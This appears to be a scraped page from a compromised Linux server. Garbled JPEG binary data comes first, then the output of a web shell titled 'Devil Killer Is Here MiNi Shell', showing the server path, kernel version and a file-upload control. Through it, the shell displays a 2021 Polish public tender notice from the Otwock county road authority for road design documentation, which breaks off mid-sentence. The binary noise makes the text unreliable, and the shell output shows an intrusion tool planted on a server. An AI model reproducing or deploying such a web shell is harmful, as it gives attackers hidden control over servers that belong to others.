JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210414/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210414/0003287001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00032870 z dnia 2021-04-14</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo - kosztorysowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo - kosztorysowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c84b7d76-9c27-11eb-945c-72824b6a02d0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00032870</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002304/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokuemnetacji projektowo - kosztorysowej na budowę lub przebudowę dróg powiatowych (część I)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.soldea.pl/epz/epz/indexpostepowaniazamawiajacy.php?s=0cffc2ec8e87e77abda1045b6a821b7c531ee3d0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.soldea.pl/epz/epz/indexpostepowaniazamawiajacy.php?s=0cffc2ec8e87e77abda1045b6a821b7c531ee3d0</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">określone w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str. 1), dalej „RODO”, informuję, że: • administratorem Pani/Pana danych osobowych jestZarząd Dróg Powiatowych w Otwocku z/s w Karczewie ul. Bohaterów Westerplatte 36, 05-480Karczew tel. 22 780 64 21• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych wOtwocku jest Pani Daria Bartnicka, email: iod@powiat-otwocki.pl ,• Pani/Pana dane osoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem oudzielenie zamówienia publicznego,• odbiorcami Pani/Pana danych osobowych będą osoby lubpodmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843),dalej „ustawa Pzp”; • Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawyPzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;•obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jestwymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniuo udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają zustawy Pzp; • w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane wsposób zautomatyzowany, stosowanie do art. 22 RODO;• posiada Pani/Pan: na podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16 RODOprawo do sprostowania Pani/Pana danych osobowych **; na podstawie art. 18 RODO prawo żądaniaod administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, októrych mowa w art. 18 ust. 2 RODO;  prawo do wniesienia skargi do Prezesa Urzędu Ochrony DanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących naruszaprzepisy RODO;• nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo dousunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-12/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi powiatowej Nr 2741W w miejscowości wola Sufczyńskaa) prace projektowenależy wykonać na odcinku od działki ewidencyjnej nr 500 obr. Wola Sufczyńska w kierunkuzachodnim do końca zabudowań w miejscowości Wola Sufczyńska - odcinek około 1 300 m,b)opracowanie przebudowy drogi w zakresie budowy chodnika lub ciągu pieszo – rowerowego lubchodnika wraz z ścieżką dla rowerów – zakres opracowania uzależniony od możliwościusytuowania wymienionych elementów pasa drogowego w terenie – w uzgodnieniu zZamawiającym. Zamawiający widzi możliwość lokalizacji ww elementów pasa drogowego poobu stronach jezdni, po jednej stronie jezdni lub naprzemiennie – wybór rozwiązania wuzgodnieniu z Zamawiającym,c) zakres opracowania w granicach istniejących działekdrogowych lub w przypadku braku możliwości usytuowania projektowanych elementów w pasiedrogowym, w porozumieniu z zamawiającym wykonanie dokumentacji w trybie ustawy z dnia 10kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie drógpublicznychd) zaprojektowanie odwodnienia – zamawiający rekomenduje odwodnienie z wykorzystaniem studni chłonnych wraz z rozsączeniem usytuowanym pod chodnikiem, ścieżkąrowerową lub ciągiem pieszo-rowerowym,e) w przypadku konieczności przykrycia istniejącychrowów lub przebudowy/ budowy urządzeń wodnych uzyskanie zaświadczenia o niewniesieniusprzeciwu do zgłoszenia wodnoprawnego, lub uzyskanie decyzji o pozwoleniu wodnoprawnymf)zaprojektowanie peronów autobusowych dla komunikacji publicznej z uwzględnieniemnawierzchni z płyt antypoślizgowych, żółtych płyt ostrzegawczych z wypustkami oraz wykonaniaobramowania peronu od strony jezdni krawężnikiem kamiennym,g) zaprojektowanie kanałutechnologicznego w granicy pasa drogowego,h) konstrukcję nawierzchni chodnika, ścieżkąrowerową lub ciągiem pieszo-rowerowym, zjazdów należy uzgodnić z zamawiającym,i)usunięcie kolizji z istniejącymi sieciami uzbrojenia terenu w szczególności napowietrznej liniienergetycznej oraz telekomunikacyjnej, a w razie konieczności innych urządzeń niezwiązanychz potrzebami zarządzania drogami lub potrzebami ruchu drogowegoj) uzyskanie decyzji ośrodowiskowych uwarunkowaniach,k) opracowanie projektu stałej organizacji ruchu wraz zuzyskaniem zatwierdzenia,l) uzyskać w imieniu Zamawiającego zaświadczenie o nie wniesieniusprzeciwu do zgłoszenia, pozwolenie na budowę lub decyzję zezwalającą na realizacjęinwestycji drogowejm) w ramach zamówienia należy opracować wszystkie niezbędne materiały iuzyskać wszystkie uzgodnienia do pozwolenia na budowę,n) koszt uzgodnień, w tym opłata zapozwolenie wodnoprawne ponosi wykonawca dokumentacji,o) tytuł projektu budowlanego, wporozumieniu z Zamawiającym oraz w uzgodnieniu z Wydziałem Architektury i Budownictwap)przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa oraz musibyć kompletna z punktu widzenia celu, któremu ma służyć potwierdzone oświadczeniemwykonawcyq) dokumentacja winna zwierać w oryginale plus kopie wszystkich wymaganychprawem uzgodnień, opinii i zezwoleńr) wykonawca zobowiązany jest w 5 tygodni od datypodpisania umowy przedstawić koncepcje w wersji papierowej zawierającej rozwiązaniasytuacyjne i wysokościowe (zagospodarowanie terenu, profil podłużny, normalny, poprzeczny),a w przypadku gdy zadanie będzie realizowane na podstawie decyzji ZRiD zobowiązany jest doprzedłożenia propozycji podziału działek, s) wykonawca zobowiązany jest do przedłożenia wszczególności:- aktualną mapę do celów projektowych w ilości 1 egz.- decyzji o środowiskowychuwarunkowaniach dla realizacji przedsięwzięcia wraz z uzyskaniem decyzji w ilości 1 egz.-zaświadczenia o nie wniesieniu sprzeciwu do zgłoszenia, pozwolenie na budowę lub decyzjizezwalającą na realizację inwestycji drogowej w ilości 1 egz.- projektu budowlanego w ilości 5egz.- projekt wykonawczy dla branży drogowej w ilości 5 egz.- projekt wykonawczy dlaprzebudowywanych istniejących urządzeń obcych w przypadku zaistnienia kolizji z podziałam naposzczególne branże w ilości 5 egz.- przedmiary robót w ilości 2 egz.- kosztorys inwestorski wilości 2 egz. - szczegółową specyfikacja techniczna w ilości 3 egz. - inwentaryzacja zieleni igospodarki drzewostanem w ilości 2 egz.- warunków gruntowo – wodnych (geotechnika) w ilości3 egz.- projekt stałej organizacji ruchu wraz z zatwierdzeniem w ilości 4 egz.- całej dokumentacjiw wersji elektronicznej na nośniku zewnętrznym – pendrive edytowalna odczytywalna przezprogram MS Offfice i nie edytowalna do celów przetargowych na roboty budowlane (.pdf) orazplików dwg lub dvf- oryginału zaświadczenia o nie wniesieniu sprzeciwu do zbożnego zgłoszeniarobót budowlanych lub decyzji pozwalającej na budowę wraz z załącznikami lub decyzjizezwalającej na realizację inwestycji drogowej t) Wykonawca zobowiązany jest do uzyskaniawszystkich wymaganych odpowiednimi przepisami szczególnymi, pozwoleń, uzgodnień, opinii,dokumentów w oryginale – koszt uzyskania niezbędnych uzgodnień wykonawca zobowiązanyjest wliczyć w cenę zrealizowanego zadnia u) dokumentacja w wersji elektronicznej musizawierać projekty, opinie, uzgodnienia, wnioski zatwierdzone przez odpowiedni organ,v)dokumentacja musi zawierać w oryginale plus kopie wszystkie wymagane przepisamiuzgodnienia, opinii i zezwolenia,w) wykonawca zobowiązany jest do bieżącej informacjiZamawiającego o postępach prac, napotkanych problemach, w szczególności przedłużającej sięprocedury uzyskania opinii, uzgodnienia o 7 dni od daty ustawowego terminu ich uzyskaniax)zamawiający zastrzega sobie prawo do używania i sporządzania kopii elementów dokumentacjidla celów procedury przetargowej, bez uzyskania zezwolenia jednostki projektowej przyzachowaniu praw autorskich do opracowanego przez siebie projektu Wykonawcyy) W przypadkubraku konieczności wykonania wyspecyfikowanych w zamówieniu opracowań pozycję te nie zostaną opłacone, lecz nie zwalnia to projektanta z obowiązku dokonania właściwej analizy z) Wprzypadku stwierdzenia w czasie realizacji robót budowlanych, że elementy opracowanejdokumentacji są niezgodne ze stanem faktycznym lub nie dają się zrealizować wg tejdokumentacji oraz wymaga to przyjazdu projektanta i dokonania korekty projektu, czynności tepowinny być wykonane przez Projektanta w ciągu 3 dni od powdowienia i na koszt Wykonawcyprojektu.aa) Dokumentacja projektowa powinna być poprawna pod względem technicznym zuwzględnieniem ekonomicznych aspektów stosowania rozwiązań technicznych. bb) Wykonawcabędzie zobowiązany do sprawowania nadzoru autorskiego oraz do bezpłatnego odnowieniawygasłych uzgodnień, które stracą swoją ważność w okresie gwarancji od momentu uzyskaniadecyzji pozwolenie na budowę, niewniesienia sprzeciwu od zgłoszenia etc.4.2.6.) Główny kod CPV: 71322000-1 - Usługi inżynierii projektowej w zakres </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">238 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi powiatowej Nr 2739W w miejscowości Gadkaa) prace projektowe należywykonać na odcinku od działki ewidencyjnej nr 230/1 obr. Gadka do działki 226/12 obr. Gadkaodcinek około 1 370 m,b) opracowanie przebudowy drogi w zakresie budowy chodnika lub ciągu pieszo-rowerowego lub chodnika wraz z ścieżką dla rowerów – zakres opracowania uzależnionyod możliwości usytuowania w terenie ww. elementów c) zakres opracowania w granicachistniejących działek drogowych lub w przypadku braku możliwości usytuowania projektowanychelementów w pasie drogowym, w porozumieniu z zamawiającym wykonanie dokumentacji wtrybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacjiinwestycji w zakresie dróg publicznychd) zaprojektowanie odwodnienia – zamawiającyrekomenduje odwodnienie z wykorzystaniem studni chłonnych wraz z rozsączeniemusytuowanym pod chodnikiem, ścieżką rowerową lub ciągiem pieszo-rowerowym,e) uzyskaniezaświadczenia o niewniesieniu sprzeciwu do zgłoszenia wodnoprawnego, lub uzyskanie decyzjio pozwoleniu wodnoprawnymf) zaprojektowanie kanału technologicznego pod projektowanymchodnikiem, ścieżką rowerową lub ciągiem pieszo-rowerowym - w granicy pasa drogowego,g)konstrukcie nawierzchni chodnika, ścieżką rowerową lub ciągiem pieszo – rowerowym, zjazdównależy uzgodnić z zamawiającym,h) wskazanie działek, których ogrodzenia działek prywatnychznajdują się na działce drogowej,i) w razie konieczności usunięcie kolizji z istniejącymi sieciamiuzbrojenia terenu,j) opracowanie projektu stałej organizacji ruchu wraz z uzyskaniemzatwierdzenia,k) uzyskanie decyzji o środowiskowych uwarunkowaniachl) uzyskać w imieniuZamawiającego zaświadczenie o nie wniesieniu sprzeciwu do zgłoszenia, pozwolenie nabudowę lub decyzję zezwalającą na realizację inwestycji drogowejm) w ramach zamówienianależy opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia dopozwolenia na budowę,n) koszt uzgodnień, w tym opłata za pozwolenie wodnoprawne ponosiwykonawca dokumentacji,o) tytuł projektu budowlanego, w porozumieniu z Zamawiającym orazw uzgodnieniu z Wydziałem Architektury i Budownictwap) przedmiot zamówienia należywykonać zgodnie z obowiązującymi przepisami prawa oraz musi być kompletna z punktuwidzenia celu, któremu ma służyć potwierdzone oświadczeniem wykonawcyq) dokumentacjawinna zwierać w oryginale plus kopie wszystkich wymaganych prawem uzgodnień, opinii izezwoleńr) wykonawca zobowiązany jest w terminie 1 miesięcy od daty podpisania umowykoncepcji zagospodarowania terenu w wersji papierowej, do której Zamawiający zobowiązuje sięustosunkować,s) wykonawca zobowiązany jest w terminie 5 tygodni od daty podpisania umowyprzedstawić koncepcje w wersji papierowej zawierającej rozwiązania sytuacyjne i wysokościowe(zagospodarowanie terenu, profil podłużny, normalny, poprzeczny), a w przypadku gdy zadaniebędzie realizowane na podstawie decyzji ZRiD zobowiązany jest do przedłożenia propozycjipodziału działek t) wykonawca zobowiązany jest do przedłożenia w szczególności:- aktualnąmapę do celów projektowych w ilości 1 egz.- decyzji o środowiskowych uwarunkowaniach dlarealizacji przedsięwzięcia wraz z uzyskaniem decyzji w ilości 1 egz.- zaświadczenia o niewniesieniu sprzeciwu do zgłoszenia, pozwolenie na budowę lub decyzji zezwalającą narealizację inwestycji drogowej w ilości 1 egz.- projektu budowlanego w ilości 5 egz.- projektwykonawczy dla branży drogowej w ilości 5 egz.- projekt wykonawczy dla przebudowywanychistniejących urządzeń obcych w przypadku zaistnienia kolizji z podziałam na poszczególnebranże w ilości 5 egz.- przedmiary robót w ilości 2 egz.- kosztorys inwestorski w ilości 2 egz. -szczegółową specyfikacja techniczna w ilości 3 egz. - inwentaryzacja zieleni i gospodarkidrzewostanem w ilości 2 egz.- warunków gruntowo – wodnych (geotechnika) w ilości 3 egz.-projekt stałej organizacji ruchu wraz z zatwierdzeniem w ilości 4 egz.- całej dokumentacji wwersji elektronicznej na nośniku zewnętrznym – pendrive edytowalna odczytywalna przezprogram MS Offfice i nie edytowalna do celów przetargowych na roboty budowlane (.pdf) orazplików dwg lub dvf- oryginału zaświadczenia o nie wniesieniu sprzeciwu do zbożnego zgłoszeniarobót budowlanych lub decyzji pozwalającej na budowę wraz z załącznikami lub decyzjizezwalającej na realizację inwestycji drogowej u) Wykonawca zobowiązany jest do uzyskaniawszystkich wymaganych odpowiednimi przepisami szczególnymi, pozwoleń, uzgodnień, opinii,dokumentów w oryginale – koszt uzyskania niezbędnych uzgodnień wykonawca zobowiązanyjest w liczyć w cenę zrealizowanego zadnia v) dokumentacja w wersji elektronicznej musizawierać projekty, opinie, uzgodnienia, wnioski zatwierdzone przez odpowiedni organ,w)dokumentacja musi zawierać w oryginale plus kopie wszystkie wymagane przepisamiuzgodnienia, opinii i zezwolenia,x) wykonawca zobowiązany jest do bieżącej informacjiZamawiającego o postępach prac, napotkanych problemach, w szczególności przedłużającej się procedury uzyskania opinii, uzgodnienia o 7 dni od daty ustawowego terminu ich uzyskaniay)zamawiający zastrzega sobie prawo do używania i sporządzania kopii elementów dokumentacjidla celów procedury przetargowej, bez uzyskania zezwolenia jednostki projektowej przyzachowaniu praw autorskich do opracowanego przez siebie projektu Wykonawcyz) W przypadkubraku konieczności wykonania wyspecyfikowanych w zamówieniu opracowań pozycję te niezostaną opłacone, lecz nie zwalnia to projektanta z obowiązku dokonania właściwej analizy aa)W przypadku stwierdzenia w czasie realizacji robót budowlanych, że elementy opracowanejdokumentacji są niezgodne ze stanem faktycznym lub nie dają się zrealizować wg tejdokumentacji oraz wymaga to przyjazdu projektanta i dokonania korekty 